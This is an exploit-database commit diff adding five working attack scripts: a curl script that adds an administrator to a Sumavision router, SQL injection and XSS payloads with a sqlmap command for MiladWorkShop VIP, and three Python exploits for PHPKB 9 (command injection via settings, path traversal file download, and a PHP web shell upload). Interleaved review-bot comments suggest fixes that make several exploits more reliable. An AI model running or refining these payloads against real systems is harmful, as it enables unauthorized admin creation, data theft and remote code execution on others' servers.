DB: 2020-03-17
5 changes to exploits/shellcodes Enhanced Multimedia Router 3.0.4.27 - Cross-Site Request Forgery (Add Admin) MiladWorkShop VIP System 1.0 - 'lang' SQL Injection PHPKB Multi-Language 9 - Authenticated Remote Code Execution PHPKB Multi-Language 9 - Authenticated Directory Traversal PHPKB Multi-Language 9 - 'image-upload.php' Authenticated Remote Code Execution
This commit is contained in:
parent
9bacc6784a
commit
72f1d24f1a
6 changed files with 168 additions and 0 deletions
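--- a/exploits/asp/webapps/48217.txt
+++ b/exploits/asp/webapps/48217.txt
@@ -0,0 +1,28 @@
+# Exploit Title: Enhanced Multimedia Router 3.0.4.27 - Cross-Site Request Forgery (Add Admin)
+# Date: 2020-03-05
+# Exploit Author: Miguel Mendez Z.
+# Vendor Homepage: www.sumavision.com
+# Software Link: http://www.sumavision.com/ensite/i.php?id=29
+# Version: EMR 3.0.4.27
+# CVE : CVE-2020-10181
+
+-----------------------Exploit Bash---------------------------
+echo ""
+read -p "Set Hostname: " host
+read -p "Set username: " user
+echo "(The password should be between 6 and 32 in length)"
+read -p "Set password: " pass
+echo
+echo "[+] creating user..."
+sleep 2
+postdata=$(curl -X POST -d "type=11&cmd=3&language=0&slotNo=255&setString=$user<*1*>administrator<*1*>$pass" "http://$host/goform/formEMR30" -s | grep -i "0")
+if echo "$postdata" | grep -q "0</html>"; then
+echo "[+] http://$host/frame_en.asp"
+echo "[+] created access($user - $pass)"
+else
+echo "[-] user not created"
+fi
+------------------------------------------------------
+
+Reference:
+https://github.com/s1kr10s/Sumavision_EMR3.0/blob/master/exploit_sumavision.sh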
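Review bot: The values read by `read -p "Set username: " user` and `read -p "Set password: " pass` are spliced raw into the form-encoded body of the curl call, so any `&`, `%`, `+` or `#` in them alters the request rather than the credential, and the success test `grep -q "0</html>"` only looks for a literal `0` ahead of `</html>`, which a generic error page can satisfy as well. Sending the credential field with `--data-urlencode "setString=$user<*1*>administrator<*1*>$pass"` next to `-d "type=11&cmd=3&language=0&slotNo=255"` keeps the request intact, and checking the HTTP status (`-o /dev/null -w '%{http_code}'`) or a more specific response marker would make the `[+]`/`[-]` verdict meaningful. Worth stating for readers: the request carries no session cookie or token, so if it succeeds as written the `/goform/formEMR30` endpoint accepts the admin-add with no authentication at all, which is a stronger finding than the CSRF in the title; a CSRF PoC would normally be an auto-submitting HTML form run in a logged-in victim's browser, so it is worth confirming which of the two the device actually exhibits.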
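--- a/exploits/php/webapps/48218.txt
+++ b/exploits/php/webapps/48218.txt
@@ -0,0 +1,33 @@
+# Exploit Title: MiladWorkShop VIP System 1.0 - 'lang' SQL Injection
+# Google Dork: Powered By MiladWorkShop VIP System
+# Date: 2020-03-03
+# Exploit Author: AYADI Mohamed
+# email : ayadi.mohamed@outlook.com
+# Vendor Homepage: https://miladworkshop.ir/
+# Software Link: https://miladworkshop.ir/vip.html
+# Version: 1.x
+# Tested on: Kali Linux (sqlmap)
+# CVE : N/A
+
+
+[ SQL injection exploitation ]
+
+Address : http://vip.target/forget
+Request Type : Post
+
+Type: boolean-based blind
+Title: OR boolean-based blind - WHERE or HAVING clause
+Payload: lang=en AND 3-4400' OR 6146=6146-- ivGZ21=6 AND 000wM2X=000wM2X
+
+Type: time-based blind
+Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+Payload: lang=en AND 3' AND (SELECT 2915 FROM (SELECT(SLEEP(50)))StCO)-- vkVG21=6 AND 000wM2X=000wM2X
+
+example :
+sqlmap -u "http://vip.target/forget" --data lang=en'%20AND%203*2*1%3d6%20AND%20'000wM2X'%3d'000wM2X --random-agent --banner --ignore-prox --hex --level 3 --risk 3 --time-sec=6 --timeout 100 --tamper="between.py"
+
+
+[ XSS exploitation ]
+http://vip.target/%22%3E%3Cimg%20src=%22aa%22%20onerror=%22alert(1)%22%3E%3C
+
+#creetz to all Morrocans cyber security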
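Review bot: The sqlmap example passes the injection string unquoted, `--data lang=en'%20AND%203*2*1%3d6%20AND%20'000wM2X'%3d'000wM2X`, so a POSIX shell consumes the four single quotes as its own quoting and sqlmap receives `lang=en%20AND%203*2*1%3d6%20AND%20000wM2X%3d000wM2X` with the quote terminators stripped; wrapping the value as `--data "lang=en'%20AND%203*2*1%3d6%20AND%20'000wM2X'%3d'000wM2X"` delivers the payload as written. `--ignore-prox` is a truncated spelling of sqlmap's `--ignore-proxy`; it presumably only works because the option parser accepts unambiguous prefixes, so the full name is the safer form to publish. The title says 1.0 while the header reads `# Version: 1.x`, and the `[ XSS exploitation ]` section gives a bare URL with no request/response evidence or mention in the title, so readers should treat it as unconfirmed until the affected version and the reflection point are stated.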
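--- a/exploits/php/webapps/48219.py
+++ b/exploits/php/webapps/48219.py
@@ -0,0 +1,37 @@
+# Exploit Title: PHPKB Multi-Language 9 - Authenticated Remote Code Execution
+# Google Dork: N/A
+# Date: 2020-03-15
+# Exploit Author: Antonio Cannito
+# Vendor Homepage: https://www.knowledgebase-script.com/
+# Software Link: https://www.knowledgebase-script.com/pricing.php
+# Version: Multi-Language v9
+# Tested on: Windows 8.1 / PHP 7.4.3
+# CVE : CVE-2020-10389
+
+
+
+#!/usr/bin/env python3
+import argparse
+import requests
+
+
+#Parsing arguments
+parser = argparse.ArgumentParser(description="Exploiting CVE-2020-10389 - Authenticated Remote Code Execution in Chadha PHPKB Standard Multi-Language 9 in admin/save-settings.php")
+parser.add_argument("url", type=str, help="PHPKB's base path")
+parser.add_argument("username", type=str, help="Superuser username")
+parser.add_argument("password", type=str, help="Superuser password")
+parser.add_argument("cmd", type=str, help="The command you want executed")
+args = parser.parse_args()
+
+session = requests.Session()
+#Perform login
+session.post(args.url + "/admin/login.php", data={'phpkb_username': args.username, 'phpkb_password': args.password, 'login': 'LOGIN'}).text
+#Sending exploit code and downloading the file
+exp = """' . system("{}") . '""".format(args.cmd)
+data = {"putdown_for_maintenance": "no{}".format(exp), "kbname": "test", "kburl": "http://localhost/phpkb", "kb_access": "unrestricted", "extended_support_license_key": '', "mail_server": "default", "smtp_hostname": '', "smtp_username": '', "smtp_password": '', "smtp_port": '', "encryption_method": "None", "emails_debug_mode": "0", "emails_debug_output": "error_log", "send_mails_from": '', "test_email": '', "mysqlserver": "127.0.0.1", "mysqlusername": "root", "mysqlpswd": "DummyPass", "mysqldatabase": "test", "kb_layout": "fluid", "category_tree_width": "3", "sidebar_orientation": "left", "category_tree_layout": "normal", "show_tree_articles": "yes", "category_articles_count": "show", "categories_display_order": "Alphabetic", "home_theme": "modern", "home_search_layout": "default", "categories_layout_theme": "carousel", "show_categories_cols": "3", "category_title_size": "normal", "home_articles_layout": "tabbed", "display_featured": "yes", "featured_count": "5", "display_popular": "yes", "popular_count": "5", "display_rated": "yes", "rated_count": "5", "display_recent": "yes", "recent_count": "5", "enable_subscribe_kb": "yes", "kb_subscribe_theme": "minimal", "category_articles_layout": "default", "category_page_records_default": "10", "category_page_records_minimal": "10", "articles_sortby": "Popularity", "articles_sortorder": "Descending", "enable_subscribe_category": "yes", "enable_news_page": "yes", "display_homepage_news": "yes", "number_homepage_news": "5", "enable_login_page": "yes", "enable_glossary_page": "yes", "enable_contact_page": "yes", "send_contact_email": "yes", "contact_email_address": "tet@test.com", "enable_instant_suggestions": "yes", "minimum_question_characters": "60", "default_search": "Articles", "search_in_articles": "All", "search_in_others": "Both", "search_filter": "Any Word", "display_recentviewed": "yes", "recentviewed_count": "5", "display_popular_searches": "yes", "popularsearch_count": "5", "article_page_theme": "default", "article_sidebar_content": "related", "enable_add_favorite": "yes", "enable_print_article": "yes", "enable_email_article": "yes", "enable_exportto_msword": "yes", "enable_exportto_pdf": "yes", "enable_subscribe_article": "yes", "enable_custom_fields": "yes", "enable_article_rating": "yes", "enable_article_hits": "yes", "enable_article_author": "yes", "show_author_email": "yes", "enable_related_articles": "yes", "number_related_articles": "10", "show_related_articles_randomly": "yes", "enable_article_feedback": "yes", "enable_article_comments": "yes", "existing_comments_visibility": "hide", "show_comments_to": "all", "comments_sortorder": "Descending", "email_privacy_protection": "yes", "article_meta_source": "article title", "notify_pending_comment_superuser": "yes", "notify_approved_comment_user": "yes", "schema_publisher_name": '', "schema_publisher_logo": '', "enable_rss_feed": "yes", "enable_rss_featured_feed": "yes", "enable_rss_popular_feed": "yes", "enable_rss_latest_feed": "yes", "enable_rss_rated_feed": "yes", "enable_rss_related_feed": "yes", "number_login_attempts": "9223372036854775807", "login_delay": "5", "maxfilesize": "10240", "kb_allowed_upload_file_types": "gif,jpg,jpeg,png,wma,wmv,swf,doc,docx,zip,pdf,txt", "searching_method": "0", "fulltext_mode": "0", "searchresultsperpage": "10", "enable_search_files": "yes", "doc_path": "C:\\antiword\\antiword.exe", "ppt_path": "C:\\xampp\\htdocs\\phpkb\\admin\\ppthtml.exe", "xls_path": "C:\\xampp\\htdocs\\phpkb\\admin\\xlhtml.exe", "pdf_path": "C:\\xampp\\htdocs\\phpkb\\admin\\pdftotext.exe", "index_attachment": "yes", "enable_autosave": "yes", "autosave_interval": "120000", "use_wysiwyg_editor": "yes", "enable_version_history": "yes", "enable_captcha": "yes", "captcha_type": "default", "recaptcha_site_key": '', "recaptcha_secret_key": '', "syntax_highlighter_theme": "shThemeDefault", "pdf_library": "wkhtmltopdf", "wkhtmltopdf_path": "lol", "pdf_header": '', "pdf_footer_type": "default", "pdf_page_numbers": "yes", "pdf_page_number_position": "Left", "pdf_footer": '', "kb_meta_keywords": "keyword1, keyword2, keyword3", "kb_meta_desc": "This is demo meta description. You can enter here your meta description.", "admin_results_perpage": "10", "_selected_tab_": '', "submit_hd": "Save", "submit_float_btn": ''}
+url = args.url + "/admin/manage-settings.php"
+session.post(url, data=data)
+print(session.get(args.url + "admin/include/configuration.php").text.encode('utf-8'))
+#Resetting settings
+data = {"putdown_for_maintenance": "no{}", "kbname": "test", "kburl": "http://localhost/phpkb", "kb_access": "unrestricted", "extended_support_license_key": '', "mail_server": "default", "smtp_hostname": '', "smtp_username": '', "smtp_password": '', "smtp_port": '', "encryption_method": "None", "emails_debug_mode": "0", "emails_debug_output": "error_log", "send_mails_from": '', "test_email": '', "mysqlserver": "127.0.0.1", "mysqlusername": "root", "mysqlpswd": "DummyPass", "mysqldatabase": "test", "kb_layout": "fluid", "category_tree_width": "3", "sidebar_orientation": "left", "category_tree_layout": "normal", "show_tree_articles": "yes", "category_articles_count": "show", "categories_display_order": "Alphabetic", "home_theme": "modern", "home_search_layout": "default", "categories_layout_theme": "carousel", "show_categories_cols": "3", "category_title_size": "normal", "home_articles_layout": "tabbed", "display_featured": "yes", "featured_count": "5", "display_popular": "yes", "popular_count": "5", "display_rated": "yes", "rated_count": "5", "display_recent": "yes", "recent_count": "5", "enable_subscribe_kb": "yes", "kb_subscribe_theme": "minimal", "category_articles_layout": "default", "category_page_records_default": "10", "category_page_records_minimal": "10", "articles_sortby": "Popularity", "articles_sortorder": "Descending", "enable_subscribe_category": "yes", "enable_news_page": "yes", "display_homepage_news": "yes", "number_homepage_news": "5", "enable_login_page": "yes", "enable_glossary_page": "yes", "enable_contact_page": "yes", "send_contact_email": "yes", "contact_email_address": "tet@test.com", "enable_instant_suggestions": "yes", "minimum_question_characters": "60", "default_search": "Articles", "search_in_articles": "All", "search_in_others": "Both", "search_filter": "Any Word", "display_recentviewed": "yes", "recentviewed_count": "5", "display_popular_searches": "yes", "popularsearch_count": "5", "article_page_theme": "default", "article_sidebar_content": "related", "enable_add_favorite": "yes", "enable_print_article": "yes", "enable_email_article": "yes", "enable_exportto_msword": "yes", "enable_exportto_pdf": "yes", "enable_subscribe_article": "yes", "enable_custom_fields": "yes", "enable_article_rating": "yes", "enable_article_hits": "yes", "enable_article_author": "yes", "show_author_email": "yes", "enable_related_articles": "yes", "number_related_articles": "10", "show_related_articles_randomly": "yes", "enable_article_feedback": "yes", "enable_article_comments": "yes", "existing_comments_visibility": "hide", "show_comments_to": "all", "comments_sortorder": "Descending", "email_privacy_protection": "yes", "article_meta_source": "article title", "notify_pending_comment_superuser": "yes", "notify_approved_comment_user": "yes", "schema_publisher_name": '', "schema_publisher_logo": '', "enable_rss_feed": "yes", "enable_rss_featured_feed": "yes", "enable_rss_popular_feed": "yes", "enable_rss_latest_feed": "yes", "enable_rss_rated_feed": "yes", "enable_rss_related_feed": "yes", "number_login_attempts": "9223372036854775807", "login_delay": "5", "maxfilesize": "10240", "kb_allowed_upload_file_types": "gif,jpg,jpeg,png,wma,wmv,swf,doc,docx,zip,pdf,txt", "searching_method": "0", "fulltext_mode": "0", "searchresultsperpage": "10", "enable_search_files": "yes", "doc_path": "C:\\antiword\\antiword.exe", "ppt_path": "C:\\xampp\\htdocs\\phpkb\\admin\\ppthtml.exe", "xls_path": "C:\\xampp\\htdocs\\phpkb\\admin\\xlhtml.exe", "pdf_path": "C:\\xampp\\htdocs\\phpkb\\admin\\pdftotext.exe", "index_attachment": "yes", "enable_autosave": "yes", "autosave_interval": "120000", "use_wysiwyg_editor": "yes", "enable_version_history": "yes", "enable_captcha": "yes", "captcha_type": "default", "recaptcha_site_key": '', "recaptcha_secret_key": '', "syntax_highlighter_theme": "shThemeDefault", "pdf_library": "wkhtmltopdf", "wkhtmltopdf_path": "lol", "pdf_header": '', "pdf_footer_type": "default", "pdf_page_numbers": "yes", "pdf_page_number_position": "Left", "pdf_footer": '', "kb_meta_keywords": "keyword1, keyword2, keyword3", "kb_meta_desc": "This is demo meta description. You can enter here your meta description.", "admin_results_perpage": "10", "_selected_tab_": '', "submit_hd": "Save", "submit_float_btn": ''}
+session.post(url, data=data)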
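Review bot: The readback `session.get(args.url + "admin/include/configuration.php")` omits the leading slash that every other request in the file uses, so with a base URL such as `http://host/phpkb` it requests `http://host/phpkbadmin/include/configuration.php` and the command output is never shown; it should be `args.url + "/admin/include/configuration.php"`. The reset POST still sends `"putdown_for_maintenance": "no{}"` — the `.format(exp)` was dropped but the literal `{}` stayed — so the value written back is `no{}` rather than `no`. More seriously, both POSTs replace the target's entire configuration with the hard-coded lab values (`"mysqlusername": "root"`, `"mysqlpswd": "DummyPass"`, `"kburl": "http://localhost/phpkb"`, the `C:\\xampp\\...` tool paths), so the "reset" restores the author's dummy settings, not the original ones, and a real target is presumably left with a broken database connection; the script should read the current settings form first and resubmit those values, or at minimum the header should state that the PoC is destructive. The login response is also discarded (`...).text` with nothing assigned), so a failed login proceeds silently to the settings overwrite.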
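--- a/exploits/php/webapps/48220.py
+++ b/exploits/php/webapps/48220.py
@@ -0,0 +1,34 @@
+# Exploit Title: PHPKB Multi-Language 9 - Authenticated Directory Traversal
+# Google Dork: N/A
+# Date: 2020-03-15
+# Exploit Author: Antonio Cannito
+# Vendor Homepage: https://www.knowledgebase-script.com/
+# Software Link: https://www.knowledgebase-script.com/pricing.php
+# Version: Multi-Language v9
+# Tested on: Windows 8.1 / PHP 7.4.3
+# CVE : CVE-2020-10387
+##########################
+
+
+#!/usr/bin/env python3
+import argparse
+import requests
+import shutil
+
+#Parsing arguments
+parser = argparse.ArgumentParser(description="Exploiting CVE-2020-10387 - Authenticated Arbitrary File Download in admin/download.php in Chadha PHPKB Standard Multi-Language 9")
+parser.add_argument("url", type=str, help="PHPKB's base path")
+parser.add_argument("username", type=str, help="Superuser username")
+parser.add_argument("password", type=str, help="Superuser password")
+parser.add_argument("file", type=str, help="The file you want to download (starting from PHPKB's base path)")
+args = parser.parse_args()
+
+session = requests.Session()
+#Perform login
+session.post(args.url + "/admin/login.php", data={'phpkb_username': args.username, 'phpkb_password': args.password, 'login': 'LOGIN'}).text
+#Sending exploit code and downloading the file
+url = args.url + "/admin/download.php?called=ajax&act=backup-lang&file=../../" + args.file
+ext = url.split("/")[-1]
+with open(ext, 'wb') as file:
+    shutil.copyfileobj(session.get(url, stream=True).raw, file)
+del session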
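Review bot: The response of `session.get(url, stream=True)` is copied to disk unconditionally, so a failed login or a rejected path stores the HTML error page under the requested name with no sign that anything went wrong; bind the response first and check it, `resp = session.get(url, stream=True)` / `resp.raise_for_status()`, before `shutil.copyfileobj(resp.raw, file)`. The local filename `ext = url.split("/")[-1]` is the last segment of the caller-supplied `file` argument, so a value ending in `/` gives an empty name and `open` fails, and an existing local file of the same name is silently overwritten; `os.path.basename(args.file) or "download.bin"` (with `import os`) plus an existence check is safer, and the name `ext` suggests an extension rather than a basename. The fixed `../../` prefix is presumably the depth from `admin/download.php` to the install root, which is what the help text "starting from PHPKB's base path" implies, but that is inferred rather than shown here; an optional depth argument would make the script usable against other layouts. `del session` on the last line does nothing useful; `with requests.Session() as session:` closes the connection deterministically.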
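--- a/exploits/php/webapps/48221.py
+++ b/exploits/php/webapps/48221.py
@@ -0,0 +1,31 @@
+# Exploit Title: PHPKB Multi-Language 9 - 'image-upload.php' Authenticated Remote Code Execution
+# Google Dork: N/A
+# Date: 2020-03-15
+# Exploit Author: Antonio Cannito
+# Vendor Homepage: https://www.knowledgebase-script.com/
+# Software Link: https://www.knowledgebase-script.com/pricing.php
+# Version: Multi-Language v9
+# Tested on: Windows 8.1 / PHP 7.4.3
+# CVE : CVE-2020-10386
+
+
+#!/usr/bin/env python3
+import argparse
+import requests
+from json import loads
+
+#Parsing arguments
+parser = argparse.ArgumentParser(description="Exploiting CVE-2020-10386 - Remote Code Execution via .php file upload in admin/imagepaster/image-upload.php in Chadha PHPKB Standard Multi-Language 9")
+parser.add_argument("url", type=str, help="PHPKB's base path")
+parser.add_argument("username", type=str, help="Superuser/Writer/Translator/Editor username")
+parser.add_argument("password", type=str, help="Superuser/Writer/Translator/Editor password")
+parser.add_argument("command", type=str, help="The command you want to execute")
+args = parser.parse_args()
+
+session = requests.Session()
+#Perform login
+session.post(args.url + "/admin/login.php", data={'phpkb_username': args.username, 'phpkb_password': args.password, 'login': 'LOGIN'}).text
+#Sending exploit code
+baseurl = loads(session.post(args.url + "/admin/imagepaster/image-upload.php", files={'file': "<?php echo shell_exec($_GET['cmd'].' 2>&1'); ?>"}, data={'action': 'imageinsert_upload', 'imgMime': 'image/php', 'imgName': '../js/index.png', 'imgParent': 'null'}).text)["url"]
+print("Visit this page to execute the command:\n" + baseurl + "?cmd=" + args.command)
+print("\nIf you want to execute other commands you can re-execute the exploit or visit this webpage, followed by the command you want executed:\n" + baseurl + "?cmd=")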
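Review bot: The command is appended to the printed URL unencoded in `baseurl + "?cmd=" + args.command`, so anything containing a space, `&`, `#` or `+` is truncated or altered by the time it reaches `$_GET['cmd']`; use `baseurl + "?cmd=" + quote(args.command)` with `from urllib.parse import quote`. `loads(...)["url"]` assumes the upload succeeded: a failed login or a rejected upload presumably returns HTML or a different JSON shape, and either surfaces as an opaque `JSONDecodeError`/`KeyError` instead of a message, so bind the response and check `resp.ok` and `"url" in body` before printing. The dropped file `<?php echo shell_exec($_GET['cmd'].' 2>&1'); ?>` is a persistent web shell that runs commands for anyone who learns its URL, and the script offers no removal step; gating it on a per-run random token (for example `$_GET['t']` compared against a `secrets.token_hex()` value baked into the upload) and documenting the file to delete afterwards would limit the exposure during an engagement. The roles of `imgMime: 'image/php'` and `imgName: '../js/index.png'` in producing a `.php` file on the server are not visible here, so a one-line comment explaining why those values yield an executable path would help the next reader.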
|
@ -42471,3 +42471,8 @@ id,file,description,date,author,type,platform,port
|
|||
48210,exploits/php/webapps/48210.py,"Horde Groupware Webmail Edition 5.2.22 - PHAR Loading",2020-03-11,"Andrea Cardaci",webapps,php,
|
||||
48212,exploits/linux/webapps/48212.txt,"Centos WebPanel 7 - 'term' SQL Injection",2020-03-13,"Berke YILMAZ",webapps,linux,
|
||||
48215,exploits/php/webapps/48215.sh,"Horde Groupware Webmail Edition 5.2.22 - Remote Code Execution",2020-03-10,"Andrea Cardaci",webapps,php,
|
||||
48217,exploits/asp/webapps/48217.txt,"Enhanced Multimedia Router 3.0.4.27 - Cross-Site Request Forgery (Add Admin)",2020-03-16,"Miguel Mendez Z",webapps,asp,
|
||||
48218,exploits/php/webapps/48218.txt,"MiladWorkShop VIP System 1.0 - 'lang' SQL Injection",2020-03-16,"AYADI Mohamed",webapps,php,
|
||||
48219,exploits/php/webapps/48219.py,"PHPKB Multi-Language 9 - Authenticated Remote Code Execution",2020-03-16,"Antonio Cannito",webapps,php,
|
||||
48220,exploits/php/webapps/48220.py,"PHPKB Multi-Language 9 - Authenticated Directory Traversal",2020-03-16,"Antonio Cannito",webapps,php,
|
||||
48221,exploits/php/webapps/48221.py,"PHPKB Multi-Language 9 - 'image-upload.php' Authenticated Remote Code Execution",2020-03-16,"Antonio Cannito",webapps,php,
|
||||
|
|